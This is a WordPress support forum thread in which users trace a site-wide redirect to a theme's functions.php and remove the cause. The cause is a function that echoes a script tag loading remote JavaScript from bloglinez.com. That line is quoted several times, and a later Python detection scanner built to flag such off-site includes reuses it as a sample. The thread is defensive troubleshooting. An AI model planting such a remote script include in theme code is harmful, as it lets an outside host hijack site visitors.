Is my site hacked? (36 posts)

  1. moemontreal
    Member
    Posted 2 years ago #

    Hi guys, I'm freaking out, all my posts are redirecting to this website: http://www.bloglinez.com/

    All my posts show, but when I click on a post it goes to this site: http://www.bloglinez.com/

    How can I fix this?

  2. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    It would help if you told us the url of your site.

  3. moemontreal
    Member
    Posted 2 years ago #

  4. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I can't find any sign of malware on your site but it does look like your .htaccess file may have been hacked. Have you spoken to your hosts about this?

  5. moemontreal
    Member
    Posted 2 years ago #

    No, I don't know what to do...

    Is there anything I can do myself?

    Could I delete my .htaccess file? Or change something?

    Here is the file info:
    Options All -Indexes

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /news/
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /news/index.php [L]
    </IfModule>

    # END WordPress

  6. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Contact your hosts. This appears to be a hack at the server level.

  7. moemontreal
    Member
    Posted 2 years ago #

    The site is working fine now, I called the hosting company and they didn't find anything wrong.

    What can I do now? The site is back to normal but it's suspicious. How can I protect the site?

    I have
    login lockdown
    firewall
    wp-Malwatch
    WSD Security plugins installed

    Plus I have a directory password on the (wp-admin) folders.

    What else can I do?

  8. moemontreal
    Member
    Posted 2 years ago #

    It came back :(

    I don't know what to do, I'm going nuts.

  9. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    The site is working fine now, I called the hosting company

    Hmm... so the site started working normally after you contacted your hosts? I'd be willing to place a smaller wager that it was just a screw up at their end.

  10. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    What happens if you reset your custom permalinks back to the default setting via Settings -> Permalinks and rename your .htaccess file?

  11. vancoovur
    Member
    Posted 2 years ago #

    You can prevent this from happening again by editing your 'functions.php' file. Look for this:

    function my_settings() {
    echo '<script src="http://www.bloglinez.com/theme.js" type="text/javascript"></script>';
    }

    Then change it to this:

    function my_settings() {
    // echo '';
    }

    It will no longer access theme.js on the bloglinez.com server (which is basically a script to redirect your theme) and you should have no further problems.

  12. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

  13. moemontreal
    Member
    Posted 2 years ago #

    I did the changes but it's still redirecting to that dumb site http://www.bloglinez.com/

  14. vancoovur
    Member
    Posted 2 years ago #

    Another reason to avoid those nasty 'free' WP themes.

  15. vancoovur
    Member
    Posted 2 years ago #

    Moemontreal...it's working ok from here (and there's no longer a reference to bloglinez.com in the page)

  16. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    @moemontreal: Where did you download this theme from?

  17. vancoovur
    Member
    Posted 2 years ago #

    I was just in the midst of trying to find out where I got it when I found this post (I downloaded 'HotGoss' a few months ago and started having a problem this morning). I'm still searching and will advise if/when I find the source.
    I'm guessing that the redirect is switched on and off at whim to route traffic to the target site. Once they have enough people using the theme they start throwing the switch.

  18. moemontreal
    Member
    Posted 2 years ago #

    Moemontreal...it's working ok from here (and there's no longer a reference to bloglinez.com in the page)

    Yeah, thanks a lot man, I found the script in the 'functions.php' file.
    I replaced it with the code you gave me and it works fine now.

    @esmi thanks for the help too, you guys are great.

    I bought the theme from a local web designer 3 years ago and I tweaked it myself. Why?

    Yeah, I need to know where it came from. I changed my cPanel password and all the FTPs and I will also change my (WP-ADMIN) directory password as well.

    Any more tips so i can sleep well tonight? :)

  19. vancoovur
    Member
    Posted 2 years ago #

    The code wasn't added to your site...It's been there all the time. They just flipped the switch using the target js and your site started redirecting. It will be fine now you've removed the function so sleep soundly.

  20. vancoovur
    Member
    Posted 2 years ago #

    BTW...cool sports site.

  21. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I'd love to see a sample of one of these themes to see if there's a way of mass fingerprinting/identifying the hack.

  22. vancoovur
    Member
    Posted 2 years ago #

    I can upload to server or email if you like but with one line of code in a previously legit (and now unavailable) theme, chances are slim.

  23. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    If you have a copy, can you mail it to esmi[at]quirm dot net? It could be that the hackers are re-releasing genuine free GPL themes (and we've certainly come across that before).

  24. moemontreal
    Member
    Posted 2 years ago #

    Guys, one last thing.

    Now I'm getting an error:

    /home/nilespo1/public_html/news/wp-content/themes/2011ie/single.php on line 21

    Check it out, it's all the way at the bottom of the page.
    http://nilesports.com/news/2012/04/13/live-arabs-talent-episode-2-episode-2/

    BTW...cool sports site.

    Thanks man

    Also, I will check in my previous backups if that line/script in the functions.php file was there before, and I will let you guys know.

  25. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Fatal error: Call to undefined function mt_misc_header() in /home/nilespo1/public_html/news/wp-content/themes/2011ie/single.php on line 21

    Did you accidentally remove too much when you edited the hack function?

  26. moemontreal
    Member
    Posted 2 years ago #

    Did you accidentally remove too much when you edited the hack function?

    I replaced:

    function mt_misc_header() {
    	echo '<script src="http://www.bloglinez.com/theme.js" type="text/javascript"></script>';
    }

    With

    function my_settings() {
    // echo '';
    }

    I don't know what went wrong!!!

  27. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    No. Replace your change with:

    function mt_misc_header() {
    	echo '';
    }

  28. moemontreal
    Member
    Posted 2 years ago #

    Well, now I changed it to:

    function mt_misc_header() {
    // echo '';
    }

    And it's fixed. Can you please check if it works fine on your side too?

    Thanks.

    Moe.

  29. vancoovur
    Member
    Posted 2 years ago #

    moemontreal...loads fine at my end (some errors but mostly missing images having nothing to do with your theme)

  30. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    No error here either.
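
The fingerprinting question raised in post 21 can be approached by scanning a theme's PHP files for hardcoded `<script src>` tags that load from a host other than the site's own, which is the pattern found in functions.php in this thread. The Python below is an added example, not code from any participant in the thread; the function names, the `menu.js` and jQuery lines, and the sample file are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Matches <script ... src="..."> as it appears in PHP source, including inside
# echo'd string literals (an optional backslash may escape the quote).
SCRIPT_SRC = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*\\?["']([^"'\\]+)""", re.I)

def external_script_refs(php_source, site_host, allowed_hosts=()):
    """Return (line_no, url) for each hardcoded <script src> pointing off-site."""
    site_host = site_host.lower()
    trusted = {site_host, *(h.lower() for h in allowed_hosts)}
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        for url in SCRIPT_SRC.findall(line):
            host = (urlparse(url).hostname or "").lower()
            # Relative URLs have no host: they are served by the site itself.
            if host and host not in trusted and not host.endswith("." + site_host):
                findings.append((line_no, url))
    return findings

def scan_theme(theme_dir, site_host, allowed_hosts=()):
    """Walk a theme directory and report off-site script includes per file."""
    report = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        source = path.read_text(errors="replace")
        hits = external_script_refs(source, site_host, allowed_hosts)
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample modelled on the functions.php snippet quoted in the thread;
# the second function is invented to show what a legitimate include looks like.
SAMPLE = '''<?php
function mt_misc_header() {
	echo '<script src="http://www.bloglinez.com/theme.js" type="text/javascript"></script>';
}
function theme_scripts() {
	echo '<script src="/news/wp-content/themes/2011ie/js/menu.js"></script>';
	echo '<script src="http://nilesports.com/news/wp-includes/js/jquery/jquery.js"></script>';
}
'''

if __name__ == "__main__":
    for line_no, url in external_script_refs(SAMPLE, "nilesports.com"):
        print(f"functions.php:{line_no}: off-site script {url}")
```

This only catches script tags written out literally in the theme source; every hit still needs a manual look, since CDNs and analytics hosts that the site owner chose belong in `allowed_hosts`.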

Topic Closed

This topic has been closed to new replies.
